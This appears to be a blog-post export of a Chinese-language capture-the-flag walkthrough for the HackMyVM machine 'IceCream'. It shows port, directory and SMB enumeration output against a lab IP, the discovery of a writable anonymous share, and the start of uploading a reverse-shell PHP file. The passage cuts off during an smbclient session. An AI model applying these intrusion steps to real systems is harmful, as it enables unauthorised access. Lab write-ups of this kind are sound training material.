{"id":817,"date":"2025-03-20T22:29:06","date_gmt":"2025-03-20T14:29:06","guid":{"rendered":"http:\/\/162.14.82.114\/?p=817"},"modified":"2025-03-20T22:29:47","modified_gmt":"2025-03-20T14:29:47","slug":"hmv-_","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/817\/03\/20\/2025\/","title":{"rendered":"hmv[-_-]IceCream"},"content":{"rendered":"<h1>IceCream<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130144.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130144.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241009145709859\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130146.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130146.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241009151626781\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.10.101:22\nOpen 192.168.10.101:80\nOpen 192.168.10.101:139\nOpen 192.168.10.101:445\nOpen 192.168.10.101:9000\n\nPORT     STATE SERVICE     REASON  VERSION\n22\/tcp   open  ssh         syn-ack OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)\n| ssh-hostkey: \n|   256 68:94:ca:2f:f7:62:45:56:a4:67:84:59:1b:fe:e9:bc (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOo0aMrFKUdos1+tMkValDaSFRx0lOy7VE4akDQlO9DGQDNT0aT5JCXm9jcgHk7mne7bxPG2jUBms8n2O1iQNyI=\n|   256 3b:79:1a:21:81:af:75:c2:c1:2e:4e:f5:a3:9c:c9:e3 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPDdtb0wbP+\/g4yk5RfteqQ3ho372gC6QdawREJ+y9Eb\n80\/tcp   open  http        syn-ack nginx 1.22.1\n|_http-title: 403 Forbidden\n| http-methods: \n|_  Supported Methods: GET HEAD POST\n|_http-server-header: nginx\/1.22.1\n139\/tcp  open  netbios-ssn syn-ack Samba smbd 4.6.2\n445\/tcp  open  netbios-ssn syn-ack Samba smbd 4.6.2\n9000\/tcp open  cslistener? syn-ack\n| fingerprint-strings: \n|   FourOhFourRequest: \n|     HTTP\/1.1 404 Not Found\n|     Server: Unit\/1.33.0\n|     Date: Wed, 09 Oct 2024 07:17:15 GMT\n|     Content-Type: application\/json\n|     Content-Length: 40\n|     Connection: close\n|     &quot;error&quot;: &quot;Value doesn&#039;t exist.&quot;\n|   GetRequest: \n|     HTTP\/1.1 200 OK\n|     Server: Unit\/1.33.0\n|     Date: Wed, 09 Oct 2024 07:17:15 GMT\n|     Content-Type: application\/json\n|     Content-Length: 1042\n|     Connection: close\n|     &quot;certificates&quot;: {},\n|     &quot;js_modules&quot;: {},\n|     &quot;config&quot;: {\n|     &quot;listeners&quot;: {},\n|     &quot;routes&quot;: [],\n|     &quot;applications&quot;: {}\n|     &quot;status&quot;: {\n|     &quot;modules&quot;: {\n|     &quot;python&quot;: {\n|     &quot;version&quot;: &quot;3.11.2&quot;,\n|     &quot;lib&quot;: &quot;\/usr\/lib\/unit\/modules\/python3.11.unit.so&quot;\n|     &quot;php&quot;: {\n|     &quot;version&quot;: &quot;8.2.18&quot;,\n|     &quot;lib&quot;: &quot;\/usr\/lib\/unit\/modules\/php.unit.so&quot;\n|     &quot;perl&quot;: {\n|     &quot;version&quot;: &quot;5.36.0&quot;,\n|     &quot;lib&quot;: &quot;\/usr\/lib\/unit\/modules\/perl.unit.so&quot;\n|     &quot;ruby&quot;: {\n|     &quot;version&quot;: &quot;3.1.2&quot;,\n|     &quot;lib&quot;: &quot;\/usr\/lib\/unit\/modules\/ruby.unit.so&quot;\n|     &quot;java&quot;: {\n|     &quot;version&quot;: &quot;17.0.11&quot;,\n|     &quot;lib&quot;: &quot;\/usr\/lib\/unit\/modules\/java17.unit.so&quot;\n|     &quot;wasm&quot;: {\n|     &quot;version&quot;: &quot;0.1&quot;,\n|     &quot;lib&quot;: &quot;\/usr\/lib\/unit\/modules\/wasm.unit.so&quot;\n|   HTTPOptions: \n|     HTTP\/1.1 405 Method Not Allowed\n|     Server: Unit\/1.33.0\n|     Date: Wed, 09 Oct 2024 07:17:15 GMT\n|     Content-Type: application\/json\n|     Content-Length: 35\n|     Connection: close\n|_    &quot;error&quot;: &quot;Invalid method.&quot;\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port9000-TCP:V=7.94SVN%I=7%D=10\/9%Time=67062DF9%P=x86_64-pc-linux-gnu%r\nSF:(GetRequest,4A8,&quot;HTTP\/1\\.1\\x20200\\x20OK\\r\\nServer:\\x20Unit\/1\\.33\\.0\\r\\n\nSF:Date:\\x20Wed,\\x2009\\x20Oct\\x202024\\x2007:17:15\\x20GMT\\r\\nContent-Type:\\\nSF:x20application\/json\\r\\nContent-Length:\\x201042\\r\\nConnection:\\x20close\\\nSF:r\\n\\r\\n{\\r\\n\\t\\&quot;certificates\\&quot;:\\x20{},\\r\\n\\t\\&quot;js_modules\\&quot;:\\x20{},\\r\\n\\\nSF:t\\&quot;config\\&quot;:\\x20{\\r\\n\\t\\t\\&quot;listeners\\&quot;:\\x20{},\\r\\n\\t\\t\\&quot;routes\\&quot;:\\x20\\[\nSF:\\],\\r\\n\\t\\t\\&quot;applications\\&quot;:\\x20{}\\r\\n\\t},\\r\\n\\r\\n\\t\\&quot;status\\&quot;:\\x20{\\r\\\nSF:n\\t\\t\\&quot;modules\\&quot;:\\x20{\\r\\n\\t\\t\\t\\&quot;python\\&quot;:\\x20{\\r\\n\\t\\t\\t\\t\\&quot;version\\&quot;\nSF::\\x20\\&quot;3\\.11\\.2\\&quot;,\\r\\n\\t\\t\\t\\t\\&quot;lib\\&quot;:\\x20\\&quot;\/usr\/lib\/unit\/modules\/pytho\nSF:n3\\.11\\.unit\\.so\\&quot;\\r\\n\\t\\t\\t},\\r\\n\\r\\n\\t\\t\\t\\&quot;php\\&quot;:\\x20{\\r\\n\\t\\t\\t\\t\\&quot;\nSF:version\\&quot;:\\x20\\&quot;8\\.2\\.18\\&quot;,\\r\\n\\t\\t\\t\\t\\&quot;lib\\&quot;:\\x20\\&quot;\/usr\/lib\/unit\/modu\nSF:les\/php\\.unit\\.so\\&quot;\\r\\n\\t\\t\\t},\\r\\n\\r\\n\\t\\t\\t\\&quot;perl\\&quot;:\\x20{\\r\\n\\t\\t\\t\\t\nSF:\\&quot;version\\&quot;:\\x20\\&quot;5\\.36\\.0\\&quot;,\\r\\n\\t\\t\\t\\t\\&quot;lib\\&quot;:\\x20\\&quot;\/usr\/lib\/unit\/mo\nSF:dules\/perl\\.unit\\.so\\&quot;\\r\\n\\t\\t\\t},\\r\\n\\r\\n\\t\\t\\t\\&quot;ruby\\&quot;:\\x20{\\r\\n\\t\\t\\\nSF:t\\t\\&quot;version\\&quot;:\\x20\\&quot;3\\.1\\.2\\&quot;,\\r\\n\\t\\t\\t\\t\\&quot;lib\\&quot;:\\x20\\&quot;\/usr\/lib\/unit\/\nSF:modules\/ruby\\.unit\\.so\\&quot;\\r\\n\\t\\t\\t},\\r\\n\\r\\n\\t\\t\\t\\&quot;java\\&quot;:\\x20{\\r\\n\\t\\\nSF:t\\t\\t\\&quot;version\\&quot;:\\x20\\&quot;17\\.0\\.11\\&quot;,\\r\\n\\t\\t\\t\\t\\&quot;lib\\&quot;:\\x20\\&quot;\/usr\/lib\/u\nSF:nit\/modules\/java17\\.unit\\.so\\&quot;\\r\\n\\t\\t\\t},\\r\\n\\r\\n\\t\\t\\t\\&quot;wasm\\&quot;:\\x20{\\\nSF:r\\n\\t\\t\\t\\t\\&quot;version\\&quot;:\\x20\\&quot;0\\.1\\&quot;,\\r\\n\\t\\t\\t\\t\\&quot;lib\\&quot;:\\x20\\&quot;\/usr\/lib\/\nSF:unit\/modules\/wasm\\.unit\\.so\\&quot;\\r\\n\\t\\t\\t},\\r\\n\\r\\n\\t\\t&quot;)%r(HTTPOptions,C\nSF:7,&quot;HTTP\/1\\.1\\x20405\\x20Method\\x20Not\\x20Allowed\\r\\nServer:\\x20Unit\/1\\.3\nSF:3\\.0\\r\\nDate:\\x20Wed,\\x2009\\x20Oct\\x202024\\x2007:17:15\\x20GMT\\r\\nConten\nSF:t-Type:\\x20application\/json\\r\\nContent-Length:\\x2035\\r\\nConnection:\\x20\nSF:close\\r\\n\\r\\n{\\r\\n\\t\\&quot;error\\&quot;:\\x20\\&quot;Invalid\\x20method\\.\\&quot;\\r\\n}\\r\\n&quot;)%r(\nSF:FourOhFourRequest,C3,&quot;HTTP\/1\\.1\\x20404\\x20Not\\x20Found\\r\\nServer:\\x20Un\nSF:it\/1\\.33\\.0\\r\\nDate:\\x20Wed,\\x2009\\x20Oct\\x202024\\x2007:17:15\\x20GMT\\r\\\nSF:nContent-Type:\\x20application\/json\\r\\nContent-Length:\\x2040\\r\\nConnecti\nSF:on:\\x20close\\r\\n\\r\\n{\\r\\n\\t\\&quot;error\\&quot;:\\x20\\&quot;Value\\x20doesn&#039;t\\x20exist\\.\\\nSF:&quot;\\r\\n}\\r\\n&quot;);\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nHost script results:\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2024-10-09T07:17:16\n|_  start_date: N\/A\n|_clock-skew: 1s\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 16534\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 2 (port 30933\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 3 (port 19523\/udp): CLEAN (Failed to receive data)\n|   Check 4 (port 16915\/udp): CLEAN (Failed to receive data)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked\n| nbstat: NetBIOS name: ICECREAM, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)\n| Names:\n|   ICECREAM&lt;00&gt;         Flags: &lt;unique&gt;&lt;active&gt;\n|   ICECREAM&lt;03&gt;         Flags: &lt;unique&gt;&lt;active&gt;\n|   ICECREAM&lt;20&gt;         Flags: &lt;unique&gt;&lt;active&gt;\n|   \\x01\\x02__MSBROWSE__\\x02&lt;01&gt;  Flags: &lt;group&gt;&lt;active&gt;\n|   WORKGROUP&lt;00&gt;        Flags: &lt;group&gt;&lt;active&gt;\n|   WORKGROUP&lt;1d&gt;        Flags: &lt;unique&gt;&lt;active&gt;\n|   WORKGROUP&lt;1e&gt;        Flags: &lt;group&gt;&lt;active&gt;\n| Statistics:\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php -b 301,401,403,404 \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.101\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   301,401,403,404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nProgress: 6988 \/ 441122 (1.58%)[ERROR] Get &quot;http:\/\/192.168.10.101\/sed.php&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 23352 \/ 441122 (5.29%)[ERROR] Get &quot;http:\/\/192.168.10.101\/Real_Estate&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.10.101\/growth.php&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.10.101\/2488&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 28289 \/ 441122 (6.41%)\n[!] Keyboard interrupt detected, terminating.\nProgress: 28323 \/ 441122 (6.42%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ whatweb http:\/\/$IP                            \nhttp:\/\/192.168.10.101 [403 Forbidden] Country[RESERVED][ZZ], HTTPServer[nginx\/1.22.1], IP[192.168.10.101], Title[403 Forbidden], nginx[1.22.1]<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ curl http:\/\/192.168.10.101:9000\/\n{\n        &quot;certificates&quot;: {},\n        &quot;js_modules&quot;: {},\n        &quot;config&quot;: {\n                &quot;listeners&quot;: {},\n                &quot;routes&quot;: [],\n                &quot;applications&quot;: {}\n        },\n\n        &quot;status&quot;: {\n                &quot;modules&quot;: {\n                        &quot;python&quot;: {\n                                &quot;version&quot;: &quot;3.11.2&quot;,\n                                &quot;lib&quot;: &quot;\/usr\/lib\/unit\/modules\/python3.11.unit.so&quot;\n                        },\n\n                        &quot;php&quot;: {\n                                &quot;version&quot;: &quot;8.2.18&quot;,\n                                &quot;lib&quot;: &quot;\/usr\/lib\/unit\/modules\/php.unit.so&quot;\n                        },\n\n                        &quot;perl&quot;: {\n                                &quot;version&quot;: &quot;5.36.0&quot;,\n                                &quot;lib&quot;: &quot;\/usr\/lib\/unit\/modules\/perl.unit.so&quot;\n                        },\n\n                        &quot;ruby&quot;: {\n                                &quot;version&quot;: &quot;3.1.2&quot;,\n                                &quot;lib&quot;: &quot;\/usr\/lib\/unit\/modules\/ruby.unit.so&quot;\n                        },\n\n                        &quot;java&quot;: {\n                                &quot;version&quot;: &quot;17.0.11&quot;,\n                                &quot;lib&quot;: &quot;\/usr\/lib\/unit\/modules\/java17.unit.so&quot;\n                        },\n\n                        &quot;wasm&quot;: {\n                                &quot;version&quot;: &quot;0.1&quot;,\n                                &quot;lib&quot;: &quot;\/usr\/lib\/unit\/modules\/wasm.unit.so&quot;\n                        },\n\n                        &quot;wasm-wasi-component&quot;: {\n                                &quot;version&quot;: &quot;0.1&quot;,\n                                &quot;lib&quot;: &quot;\/usr\/lib\/unit\/modules\/wasm_wasi_component.unit.so&quot;\n                        }\n                },\n\n                &quot;connections&quot;: {\n                        &quot;accepted&quot;: 0,\n                        &quot;active&quot;: 0,\n                        &quot;idle&quot;: 0,\n                        &quot;closed&quot;: 0\n                },\n\n                &quot;requests&quot;: {\n                        &quot;total&quot;: 0\n                },\n\n                &quot;applications&quot;: {}\n        }\n}<\/code><\/pre>\n<h3>\u654f\u611f\u7aef\u53e3\u6d4b\u8bd5<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ enum4linux -a $IP\nStarting enum4linux v0.9.1 ( http:\/\/labs.portcullis.co.uk\/application\/enum4linux\/ ) on Wed Oct  9 03:21:44 2024\n\n =========================================( Target Information )=========================================\n\nTarget ........... 192.168.10.101\nRID Range ........ 500-550,1000-1050\nUsername ......... &#039;&#039;\nPassword ......... &#039;&#039;\nKnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none\n\n ===========================( Enumerating Workgroup\/Domain on 192.168.10.101 )===========================\n\n[+] Got domain\/workgroup name: WORKGROUP\n\n ===============================( Nbtstat Information for 192.168.10.101 )===============================\n\nLooking up status of 192.168.10.101\n        ICECREAM        &lt;00&gt; -         B &lt;ACTIVE&gt;  Workstation Service\n        ICECREAM        &lt;03&gt; -         B &lt;ACTIVE&gt;  Messenger Service\n        ICECREAM        &lt;20&gt; -         B &lt;ACTIVE&gt;  File Server Service\n        ..__MSBROWSE__. &lt;01&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Master Browser\n        WORKGROUP       &lt;00&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Domain\/Workgroup Name\n        WORKGROUP       &lt;1d&gt; -         B &lt;ACTIVE&gt;  Master Browser\n        WORKGROUP       &lt;1e&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Browser Service Elections\n\n        MAC Address = 00-00-00-00-00-00\n\n ==================================( Session Check on 192.168.10.101 )==================================\n\n[+] Server 192.168.10.101 allows sessions using username &#039;&#039;, password &#039;&#039;\n\n ===============================( Getting domain SID for 192.168.10.101 )===============================\n\nDomain Name: WORKGROUP\nDomain Sid: (NULL SID)\n\n[+] Can&#039;t determine if host is part of domain or part of a workgroup\n\n ==================================( OS information on 192.168.10.101 )==================================\n\n[E] Can&#039;t get OS info with smbclient\n\n[+] Got OS info for 192.168.10.101 from srvinfo: \n        ICECREAM       Wk Sv PrQ Unx NT SNT Samba 4.17.12-Debian\n        platform_id     :       500\n        os version      :       6.1\n        server type     :       0x809a03\n\n ======================================( Users on 192.168.10.101 )======================================\n\nUse of uninitialized value $users in print at .\/enum4linux.pl line 972.\nUse of uninitialized value $users in pattern match (m\/\/) at .\/enum4linux.pl line 975.\n\nUse of uninitialized value $users in print at .\/enum4linux.pl line 986.\nUse of uninitialized value $users in pattern match (m\/\/) at .\/enum4linux.pl line 988.\n\n ================================( Share Enumeration on 192.168.10.101 )================================\n\nsmbXcli_negprot_smb1_done: No compatible protocol selected by server.\n\n        Sharename       Type      Comment\n        ---------       ----      -------\n        print$          Disk      Printer Drivers\n        icecream        Disk      tmp Folder\n        IPC$            IPC       IPC Service (Samba 4.17.12-Debian)\n        nobody          Disk      Home Directories\nReconnecting with SMB1 for workgroup listing.\nProtocol negotiation to server 192.168.10.101 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE\nUnable to connect with SMB1 -- no workgroup available\n\n[+] Attempting to map shares on 192.168.10.101\n\n\/\/192.168.10.101\/print$ Mapping: DENIED Listing: N\/A Writing: N\/A\n\/\/192.168.10.101\/icecream       Mapping: OK Listing: OK Writing: N\/A\n\n[E] Can&#039;t understand response:\n\nNT_STATUS_CONNECTION_REFUSED listing \\*\n\/\/192.168.10.101\/IPC$   Mapping: N\/A Listing: N\/A Writing: N\/A\n\/\/192.168.10.101\/nobody Mapping: DENIED Listing: N\/A Writing: N\/A\n\n ===========================( Password Policy Information for 192.168.10.101 )===========================\n\n[+] Attaching to 192.168.10.101 using a NULL share\n\n[+] Trying protocol 139\/SMB...\n\n[+] Found domain(s):\n\n        [+] ICECREAM\n        [+] Builtin\n\n[+] Password Info for Domain: ICECREAM\n\n        [+] Minimum password length: 5\n        [+] Password history length: None\n        [+] Maximum password age: 37 days 6 hours 21 minutes \n        [+] Password Complexity Flags: 000000\n\n                [+] Domain Refuse Password Change: 0\n                [+] Domain Password Store Cleartext: 0\n                [+] Domain Password Lockout Admins: 0\n                [+] Domain Password No Clear Change: 0\n                [+] Domain Password No Anon Change: 0\n                [+] Domain Password Complex: 0\n\n        [+] Minimum password age: None\n        [+] Reset Account Lockout Counter: 30 minutes \n        [+] Locked Account Duration: 30 minutes \n        [+] Account Lockout Threshold: None\n        [+] Forced Log off Time: 37 days 6 hours 21 minutes \n\n[+] Retieved partial password policy with rpcclient:\n\nPassword Complexity: Disabled\nMinimum Password Length: 5\n\n ======================================( Groups on 192.168.10.101 )======================================\n\n[+] Getting builtin groups:\n\n[+]  Getting builtin group memberships:\n\n[+]  Getting local groups:\n\n[+]  Getting local group memberships:\n\n[+]  Getting domain groups:\n\n[+]  Getting domain group memberships:\n\n =================( Users on 192.168.10.101 via RID cycling (RIDS: 500-550,1000-1050) )=================\n\n[I] Found new SID: \nS-1-22-1\n\n[I] Found new SID: \nS-1-5-32\n\n[I] Found new SID: \nS-1-5-32\n\n[I] Found new SID: \nS-1-5-32\n\n[I] Found new SID: \nS-1-5-32\n\n[+] Enumerating users using SID S-1-5-21-780586060-1811573838-1416508090 and logon username &#039;&#039;, password &#039;&#039;\n\nS-1-5-21-780586060-1811573838-1416508090-501 ICECREAM\\nobody (Local User)\nS-1-5-21-780586060-1811573838-1416508090-513 ICECREAM\\None (Domain Group)\n\n[+] Enumerating users using SID S-1-5-32 and logon username &#039;&#039;, password &#039;&#039;\n\nS-1-5-32-544 BUILTIN\\Administrators (Local Group)\nS-1-5-32-545 BUILTIN\\Users (Local Group)\nS-1-5-32-546 BUILTIN\\Guests (Local Group)\nS-1-5-32-547 BUILTIN\\Power Users (Local Group)\nS-1-5-32-548 BUILTIN\\Account Operators (Local Group)\nS-1-5-32-549 BUILTIN\\Server Operators (Local Group)\nS-1-5-32-550 BUILTIN\\Print Operators (Local Group)\n\n[+] Enumerating users using SID S-1-22-1 and logon username &#039;&#039;, password &#039;&#039;\n\nS-1-22-1-1000 Unix User\\ice (Local User)\n\n ==============================( Getting printer info for 192.168.10.101 )==============================\n\nNo printers returned.<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ smbmap -H $IP \n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/&quot;       )|&quot;  \\    \/&quot;  ||   _  &quot;\\ |&quot;  \\    \/&quot;  |     \/&quot;&quot;\\       |   __ &quot;\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/&#039; \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __&#039;  \\    (|  \/\n   \/&quot; \\   :) |.  \\    \/:  ||: |_)  :)|.  \\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n -----------------------------------------------------------------------------\n     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB\n[*] Established 1 SMB session(s)                                \n\n[+] IP: 192.168.10.101:445      Name: lookup.hmv                Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        print$                                                  NO ACCESS       Printer Drivers\n        icecream                                                READ, WRITE     tmp Folder\n        IPC$                                                    NO ACCESS       IPC Service (Samba 4.17.12-Debian)\n        nobody                                                  NO ACCESS       Home Directories<\/code><\/pre>\n<p>\u90fd\u663e\u793a\u6709\u4e00\u4e2a\u53ef\u8bfb\u5199\u76ee\u5f55\uff01\u524d\u9762\u7684\u57df\u540d\u89e3\u6790\u5fd8\u4e86\u5220\u6389\u4e86\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ nbtscan $IP                      \nDoing NBT name scan for addresses from 192.168.10.101\n\nIP address       NetBIOS Name     Server    User             MAC address      \n------------------------------------------------------------------------------\n192.168.10.101   ICECREAM         &lt;server&gt;  ICECREAM         00:00:00:00:00:00<\/code><\/pre>\n<p>\u4ee5\u53ca<code>9000<\/code>\u7aef\u53e3\u7684\u6d4b\u8bd5\uff1a<\/p>\n<p><a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/9000-pentesting-fastcgi\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/9000-pentesting-fastcgi<\/a><\/p>\n<p>\u4ee5\u53ca <a href=\"https:\/\/gist.github.com\/phith0n\/9615e2420f31048f7e30f3937356cf75\">https:\/\/gist.github.com\/phith0n\/9615e2420f31048f7e30f3937356cf75<\/a> <\/p>\n<p>\u4f46\u662f\u672a\u679c\uff0c\u67e5\u8be2\u4e00\u4e0b\uff0c\u53d1\u73b0\u662f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130147.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130147.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241009154507241\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u767b\u5f55smb<\/h3>\n<p>\u767b\u5f55\u4ee5\u540e\u5c1d\u8bd5\u53cd\u5f39shell\uff01<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ vim revshell.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ ls -la\ntotal 28\ndrwxr-xr-x   2 kali kali 4096 Oct  9 03:46 .\ndrwxr-xr-x 136 kali kali 4096 Oct  9 02:52 ..\n-rw-r--r--   1 kali kali 8575 Oct  9 03:37 exp.py\n-rwxr-xr-x   1 kali kali  492 Oct  9 03:35 exp.sh\n-rw-r--r--   1 kali kali 3912 Oct  9 03:46 revshell.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ chmod +x revshell.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ smbclient \/\/$IP\/ICECREAM -U ICECREAM\nPassword for [WORKGROUP\\ICECREAM]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; dir\n  .                                   D        0  Wed Oct  9 03:39:01 2024\n  ..                                  D        0  Sun Oct  6 06:06:38 2024\n  